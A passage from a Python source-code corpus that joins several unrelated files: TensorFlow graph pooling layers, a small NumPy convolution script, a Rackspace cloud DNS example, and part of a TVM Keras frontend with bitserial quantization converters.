- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, n_node_features)` (if single mode, shape will
be `(1, n_node_features)`).
**Arguments**
None.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pooling_op = tf.math.segment_sum
self.batch_pooling_op = tf.reduce_sum
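# Usage sketch (not part of the original file; tensor names and shapes are illustrative).
# In batch mode the layer reduces over the node axis with the batch_pooling_op set above,
# while in disjoint mode tf.math.segment_sum reduces per graph:
#
#   X = tf.random.normal((8, 10, 3))      # 8 graphs, 10 nodes, 3 features
#   GlobalSumPool()(X)                    # batch mode    -> shape (8, 3)
#
#   Xd = tf.random.normal((25, 3))        # 25 nodes drawn from 2 graphs
#   I = tf.constant([0] * 10 + [1] * 15)  # graph ID of every node
#   GlobalSumPool()([Xd, I])              # disjoint mode -> shape (2, 3)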
class GlobalAvgPool(GlobalPool):
"""
An average pooling layer. Pools a graph by computing the average of its node
features.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, n_node_features)` (if single mode, shape will
be `(1, n_node_features)`).
**Arguments**
None.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pooling_op = tf.math.segment_mean
self.batch_pooling_op = tf.reduce_mean
class GlobalMaxPool(GlobalPool):
"""
A max pooling layer. Pools a graph by computing the maximum of its node
features.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, n_node_features)` (if single mode, shape will
be `(1, n_node_features)`).
**Arguments**
None.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pooling_op = tf.math.segment_max
self.batch_pooling_op = tf.reduce_max
class GlobalAttentionPool(GlobalPool):
r"""
A gated attention global pooling layer from the paper
> [Gated Graph Sequence Neural Networks](https://arxiv.org/abs/1511.05493)<br>
> Yujia Li et al.
This layer computes:
$$
\X' = \sum\limits_{i=1}^{N} (\sigma(\X \W_1 + \b_1) \odot (\X \W_2 + \b_2))_i
$$
where \(\sigma\) is the sigmoid activation function.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, channels)` (if single mode,
shape will be `(1, channels)`).
**Arguments**
- `channels`: integer, number of output channels;
- `kernel_initializer`: initializer for the kernel matrices;
- `bias_initializer`: initializer for the bias vectors;
- `kernel_regularizer`: regularization applied to the kernel matrices;
- `bias_regularizer`: regularization applied to the bias vectors;
- `kernel_constraint`: constraint applied to the kernel matrices;
- `bias_constraint`: constraint applied to the bias vectors.
"""
def __init__(self,
channels,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super().__init__(**kwargs)
self.channels = channels
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
def build(self, input_shape):
super().build(input_shape)
layer_kwargs = dict(
kernel_initializer=self.kernel_initializer,
bias_initializer=self.bias_initializer,
kernel_regularizer=self.kernel_regularizer,
bias_regularizer=self.bias_regularizer,
kernel_constraint=self.kernel_constraint,
bias_constraint=self.bias_constraint
)
self.features_layer = Dense(self.channels,
name='features_layer',
**layer_kwargs)
self.attention_layer = Dense(self.channels,
activation='sigmoid',
name='attn_layer',
**layer_kwargs)
self.built = True
def call(self, inputs):
if self.data_mode == 'disjoint':
X, I = inputs
if K.ndim(I) == 2:
I = I[:, 0]
else:
X = inputs
inputs_linear = self.features_layer(X)
attn = self.attention_layer(X)
masked_inputs = inputs_linear * attn
if self.data_mode in {'single', 'batch'}:
output = K.sum(masked_inputs, axis=-2,
keepdims=self.data_mode == 'single')
else:
output = tf.math.segment_sum(masked_inputs, I)
return output
def compute_output_shape(self, input_shape):
if self.data_mode == 'single':
return (1,) + (self.channels,)
elif self.data_mode == 'batch':
return input_shape[:-2] + (self.channels,)
else:
output_shape = input_shape[0]
output_shape = output_shape[:-1] + (self.channels,)
return output_shape
def get_config(self):
config = {
'channels': self.channels,
'kernel_initializer': self.kernel_initializer,
'bias_initializer': self.bias_initializer,
'kernel_regularizer': self.kernel_regularizer,
'bias_regularizer': self.bias_regularizer,
'kernel_constraint': self.kernel_constraint,
'bias_constraint': self.bias_constraint,
}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
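# Rough single-graph equivalent of call() above in plain TensorFlow (a sketch only;
# w1, b1, w2, b2 are placeholders for the weights of attention_layer and features_layer):
#
#   gate     = tf.sigmoid(tf.matmul(X, w1) + b1)   # (n_nodes, channels)
#   features = tf.matmul(X, w2) + b2               # (n_nodes, channels)
#   out      = tf.reduce_sum(gate * features, axis=0, keepdims=True)  # (1, channels)
#
# which is the docstring formula X' = sum_i (sigma(X W1 + b1) * (X W2 + b2))_i.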
class GlobalAttnSumPool(GlobalPool):
r"""
A node-attention global pooling layer. Pools a graph by learning attention
coefficients to sum node features.
This layer computes:
$$
\alpha = \textrm{softmax}( \X \a); \\
\X' = \sum\limits_{i=1}^{N} \alpha_i \cdot \X_i
$$
where \(\a \in \mathbb{R}^F\) is a trainable vector. Note that the softmax
is applied across nodes, and not across features.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, n_node_features)` (if single mode, shape will
be `(1, n_node_features)`).
**Arguments**
- `attn_kernel_initializer`: initializer for the attention weights;
- `attn_kernel_regularizer`: regularization applied to the attention kernel
matrix;
- `attn_kernel_constraint`: constraint applied to the attention kernel
matrix;
"""
def __init__(self,
attn_kernel_initializer='glorot_uniform',
attn_kernel_regularizer=None,
attn_kernel_constraint=None,
**kwargs):
super().__init__(**kwargs)
self.attn_kernel_initializer = initializers.get(
attn_kernel_initializer)
self.attn_kernel_regularizer = regularizers.get(
attn_kernel_regularizer)
self.attn_kernel_constraint = constraints.get(attn_kernel_constraint)
def build(self, input_shape):
assert len(input_shape) >= 2
if isinstance(input_shape, list) and len(input_shape) == 2:
self.data_mode = 'disjoint'
F = input_shape[0][-1]
else:
if len(input_shape) == 2:
self.data_mode = 'single'
else:
self.data_mode = 'batch'
F = input_shape[-1]
# Attention kernels
self.attn_kernel = self.add_weight(shape=(F, 1),
initializer=self.attn_kernel_initializer,
regularizer=self.attn_kernel_regularizer,
constraint=self.attn_kernel_constraint,
name='attn_kernel')
self.built = True
def call(self, inputs):
if self.data_mode == 'disjoint':
X, I = inputs
if K.ndim(I) == 2:
I = I[:, 0]
else:
X = inputs
attn_coeff = K.dot(X, self.attn_kernel)
attn_coeff = K.squeeze(attn_coeff, -1)
attn_coeff = K.softmax(attn_coeff)
if self.data_mode == 'single':
output = K.dot(attn_coeff[None, ...], X)
elif self.data_mode == 'batch':
output = K.batch_dot(attn_coeff, X)
else:
output = attn_coeff[:, None] * X
output = tf.math.segment_sum(output, I)
return output
def get_config(self):
config = {
'attn_kernel_initializer': self.attn_kernel_initializer,
'attn_kernel_regularizer': self.attn_kernel_regularizer,
'attn_kernel_constraint': self.attn_kernel_constraint,
}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
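# Shape sketch for the attention-sum pooling above (illustrative only): in single mode
# attn_coeff = softmax(X @ attn_kernel) has shape (n_nodes,), and attn_coeff[None, ...] @ X
# collapses the node axis into a (1, n_node_features) output; in disjoint mode the same
# weighted sum is taken per graph through tf.math.segment_sum.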
class SortPool(Layer):
r"""
A SortPool layer as described by
[Zhang et al](https://www.cse.wustl.edu/~muhan/papers/AAAI_2018_DGCNN.pdf).
This layer takes a graph signal \(\mathbf{X}\) and returns the topmost k
rows according to the last column.
If \(\mathbf{X}\) has fewer than k rows, the result is zero-padded to k.
**Mode**: single, disjoint, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, k, n_node_features)` (if single mode, shape will
be `(1, k, n_node_features)`).
**Arguments**
- `k`: integer, number of nodes to keep;
"""
def __init__(self, k):
super(SortPool, self).__init__()
k = int(k)
if k <= 0:
raise ValueError("K must be a positive integer")
self.k = k
def build(self, input_shape):
if isinstance(input_shape, list) and len(input_shape) == 2:
self.data_mode = 'disjoint'
self.F = input_shape[0][-1]
else:
if len(input_shape) == 2:
self.data_mode = 'single'
else:
self.data_mode = 'batch'
self.F = input_shape[-1]
def call(self, inputs):
if self.data_mode == 'disjoint':
X, I = inputs
X = ops.disjoint_signal_to_batch(X, I)
else:
X = inputs
if self.data_mode == 'single':
X = tf.expand_dims(X, 0)
N = tf.shape(X)[-2]
sort_perm = tf.argsort(X[..., -1], direction='DESCENDING')
X_sorted = tf.gather(X, sort_perm, axis=-2, batch_dims=1)
def truncate():
_X_out = X_sorted[..., : self.k, :]
return _X_out
def pad():
padding = [[0, 0], [0, self.k - N], [0, 0]]
_X_out = tf.pad(X_sorted, padding)
return _X_out
X_out = tf.cond(tf.less_equal(self.k, N), truncate, pad)
if self.data_mode == 'single':
X_out = tf.squeeze(X_out, [0])
X_out.set_shape((self.k, self.F))
elif self.data_mode == 'batch' or self.data_mode == 'disjoint':
X_out.set_shape((None, self.k, self.F))
return X_out
def get_config(self):
config = {
'k': self.k,
}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
if self.data_mode == 'single':
return self.k, self.F
elif self.data_mode == 'batch' or self.data_mode == 'disjoint':
return input_shape[0], self.k, self.F
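# Behaviour sketch (illustrative, not part of the original file): nodes are ordered by
# their last feature value in descending order and the top k rows are kept, with
# zero-padding when a graph has fewer than k nodes:
#
#   X = tf.constant([[1., .2], [3., .9], [2., .5]])  # single mode: 3 nodes, 2 features
#   SortPool(k=2)(X)  # keeps the rows whose last column is .9 and .5 -> shape (2, 2)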
layers = {
'sum': GlobalSumPool,
'avg': GlobalAvgPool,
'max': GlobalMaxPool,
'attn': GlobalAttentionPool,
'attn_sum': GlobalAttnSumPool,
'sort': SortPool
}
def get(identifier):
if identifier not in layers:
raise ValueError('Unknown identifier {}. Available: {}'
.format(identifier, list(layers.keys())))
else:
return layers[identifier] |
py | b415985ff1a3c51d794119af5bac10991d591a16 | import taichi as ti
import numpy as np
A = np.array([
[0, 1, 0],
[1, 0, 1],
[0, 1, 0],
])
def conv(A, B):
m, n = A.shape
s, t = B.shape
C = np.zeros((m + s - 1, n + t - 1), dtype=A.dtype)
for i in range(m):
for j in range(n):
for k in range(s):
for l in range(t):
C[i + k, j + l] += A[i, j] * B[k, l]
return C
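# Sanity check (added as a sketch): full 2-D convolution of an (m, n) array with an
# (s, t) kernel produces shape (m + s - 1, n + t - 1), so two 3x3 inputs give 5x5.
assert conv(A, A).shape == (5, 5)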
B = A
print(B)
B = conv(B, A)
print(B)
B = conv(B, A)
print(B)
B = conv(B, A)
print(B)
|
py | b415997a5d6fcd6b4c8470aaf1596a267323bbda | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c)2012 Rackspace US, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import os
import pyrax
import pyrax.exceptions as exc
pyrax.set_setting("identity_type", "rackspace")
creds_file = os.path.expanduser("~/.rackspace_cloud_credentials")
pyrax.set_credential_file(creds_file)
dns = pyrax.cloud_dns
def print_domain(domain):
print("Domain:", domain.name)
print(" email:", domain.emailAddress)
print(" created:", domain.created)
print()
count = 0
iterator = dns.get_domain_iterator()
for domain in iterator:
count += 1
print_domain(domain)
print("There were a total of %s domain(s)." % count)
|
py | b41599871e4a6a8fe58b369eff5212770d249492 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, import-self
"""Keras frontend."""
from __future__ import absolute_import as _abs
import sys
import numpy as np
import tvm
from .. import ir_pass
from .. import expr as _expr
from .. import module as _module
from .. import op as _op
from ... import nd as _nd
from .common import ExprTable, new_var
from riptide.anneal.anneal_funcs import *
__all__ = ['from_keras']
def _check_data_format(keras_layer):
if hasattr(keras_layer, 'data_format'):
if keras_layer.data_format != 'channels_last':
raise ValueError("Keras frontend currently supports data_format = channels_last only.")
return
def _get_pad_pair(input1d, kernel1d, stride1d):
out1d = (input1d + stride1d - 1) // stride1d
pad = np.maximum((out1d - 1) * stride1d + kernel1d - input1d, 0)
pad_before = pad // 2
pad_after = pad - pad_before
return [pad_before, pad_after]
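# Worked example (illustrative): for input width 224, kernel 7, stride 2, SAME padding
# gives out1d = (224 + 2 - 1) // 2 = 112 and pad = max((112 - 1) * 2 + 7 - 224, 0) = 5,
# which is split as [pad_before, pad_after] = [2, 3].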
def _get_elu(inexpr, alpha):
"""A helper method for elu."""
return _op.negative(alpha) * _op.nn.relu(_expr.const(1., dtype='float32') - \
_op.exp(inexpr)) + _op.nn.relu(inexpr)
def _as_list(arr):
"""Force being a list, ignore if already is."""
if isinstance(arr, list):
return arr
return [arr]
def _convert_recurrent_activation(inexpr, keras_layer):
act_type = keras_layer.recurrent_activation.__name__
return _convert_activation(inexpr, act_type, None)
def _convert_activation(inexpr, keras_layer, _):
if isinstance(keras_layer, str):
act_type = keras_layer
else:
if sys.version_info.major < 3:
act_type = keras_layer.activation.func_name
else:
act_type = keras_layer.activation.__name__
if act_type == 'linear':
if isinstance(keras_layer, str):
return inexpr
alpha = keras_layer.alpha if hasattr(keras_layer, 'alpha') else 1.
beta = keras_layer.beta if hasattr(keras_layer, 'beta') else 0.
alpha = _expr.const(alpha, dtype='float32')
beta = _expr.const(beta, dtype='float32')
return _op.add(_op.multiply(inexpr, alpha), beta)
if act_type == 'softmax':
return _op.nn.softmax(inexpr, axis=1)
if act_type == 'sigmoid':
return _op.sigmoid(inexpr)
if act_type == 'tanh':
return _op.tanh(inexpr)
if act_type == 'relu':
return _op.nn.relu(inexpr)
if act_type == 'softplus':
return _op.log(_op.add(_op.exp(inexpr), _expr.const(1., dtype='float32')))
if act_type == 'elu':
alpha = keras_layer.alpha if hasattr(keras_layer, 'alpha') else 1.
alpha = _expr.const(alpha, dtype='float32')
return _get_elu(inexpr, alpha)
if act_type == 'selu':
# Alpha, Gamma values obtained from https://arxiv.org/abs/1706.02515
alpha = keras_layer.alpha if hasattr(keras_layer, 'alpha') \
else 1.6732632423543772848170429916717
gamma = keras_layer.gamma if hasattr(keras_layer, 'gamma') \
else 1.0507009873554804934193349852946
alpha = _expr.const(alpha, dtype='float32')
gamma = _expr.const(gamma, dtype='float32')
return gamma * _get_elu(inexpr, alpha)
if act_type == 'relu6':
return _op.clip(inexpr, a_min=0., a_max=6.)
if act_type == 'softsign':
return inexpr / (_expr.const(1., dtype='float32') + _op.abs(inexpr))
if act_type == 'hard_sigmoid':
x = (_expr.const(0.2, dtype='float32') * inexpr) + _expr.const(0.5, dtype='float32')
return _op.clip(x, a_min=0., a_max=1.)
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend Keras.'.format(act_type))
def _convert_advanced_activation(inexpr, keras_layer, etab):
act_type = type(keras_layer).__name__
if act_type == 'ReLU':
if keras_layer.max_value:
return _op.clip(inexpr, a_min=0., a_max=float(keras_layer.max_value))
return _op.nn.relu(inexpr)
if act_type == 'LeakyReLU':
return _op.nn.leaky_relu(inexpr, alpha=float(keras_layer.alpha))
if act_type == 'ELU':
alpha = keras_layer.alpha if hasattr(keras_layer, 'alpha') else 1.
alpha = _expr.const(alpha, dtype='float32')
return _get_elu(inexpr, alpha)
if act_type == 'PReLU':
assert hasattr(keras_layer, 'alpha'), "alpha required for PReLU."
_check_data_format(keras_layer)
size = len(keras_layer.alpha.shape)
alpha = etab.new_const(keras_layer.get_weights()[0] \
.transpose(np.roll(range(size), 1)))
return _op.negative(alpha) * _op.nn.relu(_op.negative(inexpr)) + _op.nn.relu(inexpr)
if act_type == 'ThresholdedReLU':
theta = keras_layer.theta if hasattr(keras_layer, 'theta') else 1.
return _op.multiply(inexpr, _op.greater(inexpr, \
_expr.const(theta, dtype='float32')).astype('float32'))
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend Keras.'.format(act_type))
def _convert_merge(inexpr, keras_layer, _):
merge_type = type(keras_layer).__name__
ret = inexpr[0]
if merge_type == 'Subtract':
assert len(inexpr) == 2, "Subtract merge takes 2 inputs."
ret = _op.subtract(ret, inexpr[1])
elif merge_type in ['Add', 'Multiply', 'Maximum']:
op_map = {'Add':_op.add, 'Multiply':_op.multiply, 'Maximum':_op.maximum}
for i in range(1, len(inexpr)):
ret = op_map[merge_type](ret, inexpr[i])
elif merge_type == 'Average':
for i in range(1, len(inexpr)):
ret = _op.add(ret, inexpr[i])
ret = ret / _expr.const(len(inexpr), dtype='float32')
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend Keras.'.format(merge_type))
return ret
def _convert_dense(inexpr, keras_layer, etab):
weightList = keras_layer.get_weights()
weight = etab.new_const(weightList[0].transpose([1, 0]))
params = {'weight':weight, 'units':weightList[0].shape[1]}
input_shape = keras_layer.input_shape
input_dim = len(input_shape)
# In case of RNN dense, input shape will be (1, 1, n)
if input_dim > 2:
input_shape = tuple(dim if dim else 1 for dim in _as_list(input_shape)[0])
if input_dim != 3 or input_shape[0] != 1 or input_shape[1] != 1:
raise tvm.error.OpAttributeInvalid(
'Input shape {} is not valid for operator Dense.'.format(input_shape))
inexpr = _op.squeeze(inexpr, axis=0)
out = _op.nn.dense(data=inexpr, **params)
if keras_layer.use_bias:
bias = etab.new_const(weightList[1])
out = _op.nn.bias_add(out, bias)
# defuse activation
if sys.version_info.major < 3:
act_type = keras_layer.activation.func_name
else:
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
if input_dim > 2:
out = _op.expand_dims(out, axis=0)
return out
def _convert_convolution(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
is_deconv = type(keras_layer).__name__ == 'Conv2DTranspose'
is_depthconv = type(keras_layer).__name__ == 'DepthwiseConv2D'
weightList = keras_layer.get_weights()
if etab.data_layout == 'NHWC':
kernel_layout = 'HWIO'
else:
kernel_layout = 'OIHW'
weight = weightList[0]
if is_deconv:
kernel_h, kernel_w, n_filters, in_channels = weightList[0].shape
if kernel_layout == 'OIHW':
weight = weight.transpose([3, 2, 0, 1])
elif is_depthconv:
kernel_h, kernel_w, in_channels, depth_mult = weightList[0].shape
if kernel_layout == 'OIHW':
weight = weight.transpose([2, 3, 0, 1])
else:
weight = weight.transpose([0, 1, 3, 2])
elif etab.data_layout == 'NCHW':
kernel_h, kernel_w, in_channels, n_filters = weightList[0].shape
weight = weightList[0].transpose([3, 2, 0, 1])
else:
kernel_h, kernel_w, in_channels, n_filters = weightList[0].shape
weight = weightList[0]
if isinstance(keras_layer.dilation_rate, (list, tuple)):
dilation = [keras_layer.dilation_rate[0], keras_layer.dilation_rate[1]]
else:
dilation = [keras_layer.dilation_rate, keras_layer.dilation_rate]
dilated_kernel_h = (kernel_h - 1) * dilation[0] + 1
dilated_kernel_w = (kernel_w - 1) * dilation[1] + 1
stride_h, stride_w = keras_layer.strides
params = {'weight': etab.new_const(weight),
'kernel_size': [kernel_h, kernel_w],
'strides': [stride_h, stride_w],
'dilation': dilation,
'padding': [0, 0],
'data_layout': etab.data_layout,
'kernel_layout': kernel_layout}
if is_depthconv:
params['channels'] = in_channels * depth_mult
params['groups'] = in_channels
else:
params['channels'] = n_filters
if keras_layer.padding == 'valid':
pass
# we insert a separate pad operator
elif keras_layer.padding == 'same':
in_h = keras_layer.input_shape[1]
in_w = keras_layer.input_shape[2]
pad_t, pad_b = _get_pad_pair(in_h, dilated_kernel_h, stride_h)
pad_l, pad_r = _get_pad_pair(in_w, dilated_kernel_w, stride_w)
if etab.data_layout == 'NHWC':
params['padding'] = (pad_t, pad_l, pad_b, pad_r)
elif pad_t == pad_b and pad_l == pad_r:
params['padding'] = (pad_t, pad_l)
else:
if etab.data_layout == 'NCHW':
inexpr = _op.nn.pad(data=inexpr, pad_width=(
(0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)))
else:
inexpr = _op.nn.pad(data=inexpr, pad_width=(
(0, 0), (pad_t, pad_b), (pad_l, pad_r), (0, 0)))
else:
msg = 'Padding with {} is not supported for operator Convolution ' \
'in frontend Keras.'
raise tvm.error.OpAttributeUnimplemented(msg.format(keras_layer.padding))
if is_deconv:
out = _op.nn.conv2d_transpose(data=inexpr, **params)
else:
out = _op.nn.conv2d(data=inexpr, **params)
if keras_layer.use_bias:
bias = etab.new_const(weightList[1])
if etab.data_layout == 'NCHW':
out = _op.nn.bias_add(out, bias)
else:
out = _op.nn.bias_add(out, bias, axis=-1)
# defuse activation
if sys.version_info.major < 3:
act_type = keras_layer.activation.func_name
else:
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
return out
def _convert_separable_convolution(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
weightList = keras_layer.get_weights()
# depthwise conv
kernel_h, kernel_w, in_channels, depth_mult = weightList[0].shape
stride_h, stride_w = keras_layer.strides
weight0 = weightList[0].transpose([2, 3, 0, 1])
params0 = {'weight': etab.new_const(weight0),
'channels': in_channels * depth_mult,
'groups': in_channels,
'kernel_size': [kernel_h, kernel_w],
'strides': [stride_h, stride_w],
'dilation': [1, 1],
'padding': [0, 0]}
if keras_layer.padding == 'valid':
pass
# we insert a separate pad operator
elif keras_layer.padding == 'same':
in_h = keras_layer.input_shape[1]
in_w = keras_layer.input_shape[2]
pad_t, pad_b = _get_pad_pair(in_h, kernel_h, stride_h)
pad_l, pad_r = _get_pad_pair(in_w, kernel_w, stride_w)
if pad_t == pad_b and pad_l == pad_r:
params0['padding'] = (pad_t, pad_l)
else:
inexpr = _op.nn.pad(data=inexpr, pad_width=(
(0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)))
else:
msg = 'Padding with {} is not supported for operator Separable ' \
'Convolution in frontend Keras.'
raise tvm.error.OpAttributeUnimplemented(msg.format(keras_layer.padding))
depthconv = _op.nn.conv2d(data=inexpr, **params0)
# pointwise conv
weight1 = weightList[1].transpose([3, 2, 0, 1])
params1 = {'weight': etab.new_const(weight1),
'channels': weight1.shape[0],
'groups': 1,
'kernel_size': [1, 1],
'strides': [1, 1],
'dilation': [1, 1]}
out = _op.nn.conv2d(data=depthconv, **params1)
if keras_layer.use_bias:
bias = etab.new_const(weightList[2])
out = _op.nn.bias_add(out, bias)
# defuse activation
if sys.version_info.major < 3:
act_type = keras_layer.activation.func_name
else:
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
return out
def _convert_flatten(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
# NCHW -> NHWC so that dense can be correctly converted
if etab.data_layout == 'NCHW':
inexpr = _op.transpose(inexpr, axes=[0, 2, 3, 1])
return _op.nn.batch_flatten(inexpr)
def _convert_pooling(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
pool_type = type(keras_layer).__name__
# global pool in keras = global pool + flatten in nnvm/relay
global_pool_params = {'layout' : etab.data_layout}
if pool_type == 'GlobalMaxPooling2D':
return _convert_flatten(_op.nn.global_max_pool2d(inexpr, **global_pool_params), keras_layer, etab)
if pool_type == 'GlobalAveragePooling2D':
if etab.data_layout == 'NCHW':
return _op.nn.global_avg_pool2d(inexpr, **global_pool_params)
elif etab.data_layout == "NHWC":
return _convert_flatten(_op.nn.global_avg_pool2d(inexpr, **global_pool_params), keras_layer, etab)
pool_h, pool_w = keras_layer.pool_size
stride_h, stride_w = keras_layer.strides
params = {'pool_size': [pool_h, pool_w],
'strides': [stride_h, stride_w],
'padding': [0, 0],
'layout': etab.data_layout}
if keras_layer.padding == 'valid':
pass
elif keras_layer.padding == 'same':
in_h = keras_layer.input_shape[1]
in_w = keras_layer.input_shape[2]
pad_t, pad_b = _get_pad_pair(in_h, pool_h, stride_h)
pad_l, pad_r = _get_pad_pair(in_w, pool_w, stride_w)
params['padding'] = [pad_t, pad_l, pad_b, pad_r]
else:
raise tvm.error.OpAttributeUnimplemented(
'Padding with {} is not supported in operator Pooling.'.format(keras_layer.padding))
if pool_type == 'MaxPooling2D':
return _op.nn.max_pool2d(inexpr, **params)
if pool_type == 'AveragePooling2D':
params['count_include_pad'] = False
return _op.nn.avg_pool2d(inexpr, **params)
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend Keras.'.format(keras_layer))
def _convert_upsample(inexpr, keras_layer, _):
_check_data_format(keras_layer)
upsample_type = type(keras_layer).__name__
if upsample_type == 'UpSampling1D':
h = keras_layer.size
params = {'scale': h}
elif upsample_type == 'UpSampling2D':
h, w = keras_layer.size
if h != w:
raise tvm.error.OpAttributeInvalid(
'Height must equal width for operator Upsample.')
params = {'scale': h}
if hasattr(keras_layer, 'interpolation'):
interpolation = keras_layer.interpolation
if interpolation == 'nearest':
params['method'] = 'NEAREST_NEIGHBOR'
else:
params['method'] = 'BILINEAR'
elif upsample_type == 'UpSampling3D':
h, w, d = keras_layer.size
if h != w or w != d:
raise tvm.error.OpAttributeInvalid(
'Height, width, and depth must all be equal for operator Upsample.')
params = {'scale': h}
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend Keras.'.format(upsample_type))
return _op.nn.upsampling(inexpr, **params)
def _convert_cropping(inexpr, keras_layer, _):
_check_data_format(keras_layer)
crop_type = type(keras_layer).__name__
if crop_type == 'Cropping2D':
(_, in_h, in_w, _) = keras_layer.input_shape
((crop_t, crop_b), (crop_l, crop_r)) = keras_layer.cropping
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend Keras.'.format(crop_type))
int32_max = np.iinfo(np.int32).max
return _op.strided_slice(inexpr, begin=[0, 0, crop_t, crop_l], \
end=[int32_max, int32_max, in_h-crop_b, in_w-crop_r])
def _convert_enter_integer(inexpr, keras_layer, etab):
# Extract layer information
scale = _expr.const(keras_layer.scale, dtype='float32')
bit_range = _expr.const(2**(keras_layer.bits - 1), dtype='float32')
inexpr = inexpr * scale
# Now quantize input
inexpr = _op.clip(inexpr, a_min=0., a_max=1.)
inexpr = _op.round(bit_range * inexpr)
inexpr = _op.cast(inexpr, 'int8')
return inexpr
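# Worked example of the mapping above (illustrative values): with scale = 1.0 and
# bits = 8, bit_range = 2**7 = 128, so an input of 0.5 is clipped to 0.5 and emitted
# as round(128 * 0.5) = 64 in int8.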
def _convert_sawb_conv2d(inexpr, keras_layer, etab):
name = 'resnet18/' + keras_layer.name + '/kernel'
if etab.sawb_scales is None:
sawb_scale = 2.2
else:
sawb_scale = etab.sawb_scales[name] # multiplier for the sawb
pact_alpha = keras_layer.parent.alpha.numpy()
pact_scale = pact_alpha / (float(2**etab.activation_bits - 1)) # multiplier for the pact
x = _convert_bitserial_convolution(inexpr, keras_layer, etab)
x = _op.cast(x, dtype='float32')
x = x * _expr.const(pact_scale * sawb_scale)
return x
def _convert_bitserial_convolution(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
# Note: Overriding this to use our checkpoint weights
if etab.tf_params is None:
weightList = keras_layer.get_weights()
else:
name = 'resnet18/' + keras_layer.name + '/kernel'
weightList = [etab.tf_params[name]]
kernel_h, kernel_w, in_channels, n_filters = weightList[0].shape
# NHWC Actually needs HWIO, use OIHW for NCHW as below.
if etab.data_layout == 'NCHW':
weight = weightList[0].transpose([3, 2, 0, 1])
kernel_layout = 'BOIHW'
else:
weight = weightList[0]
kernel_layout = 'HWBIO'
if isinstance(keras_layer.dilation_rate, (list, tuple)):
dilation = [keras_layer.dilation_rate[0], keras_layer.dilation_rate[1]]
else:
dilation = [keras_layer.dilation_rate, keras_layer.dilation_rate]
dilated_kernel_h = (kernel_h - 1) * dilation[0] + 1
dilated_kernel_w = (kernel_w - 1) * dilation[1] + 1
stride_h, stride_w = keras_layer.strides
# Quantize and bitpack weights. - Weights are passed in pre-quantized, but not yet bitpacked
if etab.tf_params is None:
weight = (weight > 0).astype('int16')
weight = _op.cast(etab.new_const(weight), 'int16')
else:
weight = etab.new_const(weight)
if etab.data_layout == 'NCHW':
q_weight = _op.nn.bitpack(weight, bits=etab.weight_bits, pack_axis=1, bit_axis=0, pack_type='uint8')
else:
q_weight = _op.nn.bitpack(weight, bits=etab.weight_bits, pack_axis=2, bit_axis=2, pack_type='uint8')
params = {'weight': q_weight,
'kernel_size': [kernel_h, kernel_w],
'strides': [stride_h, stride_w],
